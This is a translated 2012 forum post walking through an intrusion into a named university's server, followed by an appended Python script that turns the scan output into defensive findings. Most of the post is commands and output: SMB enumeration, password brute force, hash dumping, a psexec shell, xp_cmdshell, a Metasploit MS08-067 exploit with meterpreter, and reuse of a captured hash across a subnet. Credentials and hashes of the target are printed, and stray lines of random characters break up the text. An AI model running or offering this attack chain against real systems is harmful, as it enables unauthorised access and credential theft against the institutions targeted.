
nmap + msf intrusion of Guangxi Normal University

Posted by the original poster on 2012-12-4 12:46:42
Guangxi Normal University website: http://202.103.242.241/

root@bt:~# nmap -sS -sV 202.103.242.241

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00048s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows 2000 microsoft-ds
1025/tcp open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
1026/tcp open  msrpc         Microsoft Windows RPC
3372/tcp open  msdtc?
3389/tcp open  ms-term-serv?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
SF:(GetRequest,6,"hO\n\x000Z")%r(RTSPRequest,6,"hO\n\x000Z")%r(HTTPOptions
SF:,6,"hO\n\x000Z")%r(Help,6,"hO\n\x000Z")%r(SSLSessionReq,6,"hO\n\x000Z")
SF:%r(FourOhFourRequest,6,"hO\n\x000Z")%r(LPDString,6,"hO\n\x000Z")%r(SIPO
SF:ptions,6,"hO\n\x000Z");
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
Service Info: OS: Windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds
- S: ]6 A. b! Y( e
root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb   // list the SMB scan scripts

-rw-r--r-- 1 root root 44055 2011-07-09 07:36 smb-brute.nse
-rw-r--r-- 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
-rw-r--r-- 1 root root  4806 2011-07-09 07:36 smb-enum-domains.nse
-rw-r--r-- 1 root root  3475 2011-07-09 07:36 smb-enum-groups.nse
-rw-r--r-- 1 root root  7958 2011-07-09 07:36 smb-enum-processes.nse
-rw-r--r-- 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
-rw-r--r-- 1 root root  6014 2011-07-09 07:36 smb-enum-shares.nse
-rw-r--r-- 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
-rw-r--r-- 1 root root  1658 2011-07-09 07:36 smb-flood.nse
-rw-r--r-- 1 root root  2906 2011-07-09 07:36 smb-os-discovery.nse
-rw-r--r-- 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
-rw-r--r-- 1 root root  4362 2011-07-09 07:36 smb-security-mode.nse
-rw-r--r-- 1 root root  2311 2011-07-09 07:36 smb-server-stats.nse
-rw-r--r-- 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
-rw-r--r-- 1 root root  1429 2011-07-09 07:36 smbv2-enabled.nse
! \1 J6 v" k* e. X- A5 k( p1 r9 w$ d  s
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-users.nse 202.103.242.241
// use the script to enumerate the accounts that exist on the remote machine

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00038s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-users:
|_  Domain: PG-F289F9A8EF3E; Users: Administrator, Guest, test, TsInternetUser   // scan result

Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds
. j4 ]9 \& ?3 L% @6 T
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-shares.nse 202.103.242.241
// list the shares

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00035s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   C$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ

Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse 202.103.242.241
// obtain user passwords

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00041s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful

Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds
% p4 ^! F" {& Y, {3 G3 d6 A! D' f5 Z: Y9 p+ ~2 d. `* y
root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2   // grab the hashes
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
root@bt:~# nmap --script=smb-pwdump.nse --script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.0012s latency).
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-pwdump:
|   Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
|   Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
|   test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_  TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2

Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds
% A  A8 I: q/ T  }1 r
C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test -p 123456 -e cmd.exe   // get a cmd shell

PsExec v1.55 - Execute processes remotely
Copyright (C) 2001-2004 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig

Windows 2000 IP Configuration

Ethernet adapter 本地连接:

Connection-specific DNS Suffix  . :
IP Address. . . . . . . . . . . . : 202.103.242.241
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 202.103.1.1

C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P "123456" -Q "exec master..xp_cmdshell 'net user' "   // log in remotely as sa and run a command
8 W! Y" M& u1 l( S3 U' q& O; _- V6 e+ X& U  p( k( i% e
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-check-vulns.nse 202.103.242.241   // check the target machine for vulnerabilities

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00046s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-check-vulns:
|_  MS08-067: VULNERABLE

Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds
6 E$ N- A7 V' _" s. ?1 [3 K8 |3 i
root@bt:~# msfconsole   // use the MS08-067 vulnerability in msf to exploit the target machine

msf > search ms08
msf > use exploit/windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) > show options
msf  exploit(ms08_067_netapi) > set RHOST 202.103.242.241
msf  exploit(ms08_067_netapi) > show payloads
msf  exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf  exploit(ms08_067_netapi) > exploit
meterpreter >
Background session 2? [y/N]  (ctrl+z)
msf  exploit(ms08_067_netapi) > sessions -l

root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
test
administrator

root@bt:/usr/local/share/nmap/scripts# vim password.txt
44EFCE164AB921CAAAD3B435B51404EE

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse --script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
// try to log in across the whole internal subnet with the user names and the captured hash

Nmap scan report for 192.168.1.105
Host is up (0.00088s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|_  administrator:<blank> => Login was successful

Attack successful: a simple msf + nmap attack.
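Seen from the administrator's side, the same NSE output is an audit report of what needs fixing. The following Python is an added example, not code from the post or from Nmap: it parses nmap's "Host script results:" block (the format shown above) into defender findings, and reads the pwdump lines the way an auditor would, flagging empty passwords and stored LM hashes (an LM hash whose second half is AAD3B435B51404EE came from a password of 7 characters or fewer). The sample report is constructed to mirror the post's output.

```python
import re

EMPTY_LM_HALF = "AAD3B435B51404EE"  # LM hash of seven null bytes; a stored LM hash ending in it means the password was 7 chars or fewer
HEADER = re.compile(r"^\|_? ([\w-]+):$")                   # '| smb-brute:' opens a script's output
PWDUMP = re.compile(r"^(\S+):(\d+) => ([^:]+):([^:]+)$")   # pwdump line: user:rid => LM:NT

# Constructed sample that mirrors the post's output; not a real scan result.
SAMPLE_REPORT = """\
Host script results:
| smb-enum-shares:
|   IPC$
|_    Anonymous access: READ
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful
| smb-check-vulns:
|_  MS08-067: VULNERABLE
| smb-pwdump:
|   Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
|_  test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
"""

def parse_host_scripts(report):
    """Return {script name: [content lines]} from the 'Host script results:' block."""
    scripts, name, active = {}, None, False
    for line in report.splitlines():
        if line.startswith("Host script results:"):
            active = True                           # ignore per-port script lines before the block
        elif active and line.startswith("|"):
            if (m := HEADER.match(line)):
                name, scripts[m.group(1)] = m.group(1), []
            else:                                   # '|_' only marks a script's last line
                scripts[name].append(line[1:].lstrip("_ "))
    return scripts

def triage(report):
    """Turn the four scripts' output into findings a defender would act on."""
    out, s, share = [], parse_host_scripts(report), None
    for text in s.get("smb-enum-shares", []):
        if not text.startswith("Anonymous access:"):
            share = text                            # a share name line precedes its attributes
        elif not text.endswith("<none>"):
            out.append(f"share {share}: anonymous {text.split(': ')[1]} access")
    for text in s.get("smb-brute", []):
        if text.endswith("Login was successful"):
            user, pw = text.split(" =>")[0].split(":", 1)
            out.append(f"account {user}: {'blank' if pw == '<blank>' else 'guessable'} password")
    out += [f"unpatched: {t.split(':')[0]}" for t in s.get("smb-check-vulns", []) if "VULNERABLE" in t]
    for text in s.get("smb-pwdump", []):
        if (m := PWDUMP.match(text)) and m.group(4).startswith("NO PASSWORD"):
            out.append(f"account {m.group(1)}: no password set")
        elif m and not m.group(3).startswith("NO PASSWORD"):
            short = " (password 7 chars or fewer)" if m.group(3).upper().endswith(EMPTY_LM_HALF) else ""
            out.append(f"account {m.group(1)}: LM hash stored{short}")
    return out
```

Each finding maps to a fix the post itself demonstrates the cost of skipping: restrict anonymous IPC$ access, set and enforce passwords, apply MS08-067, and disable LM hash storage so a dumped hash cannot be replayed across the subnet as in the final step.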
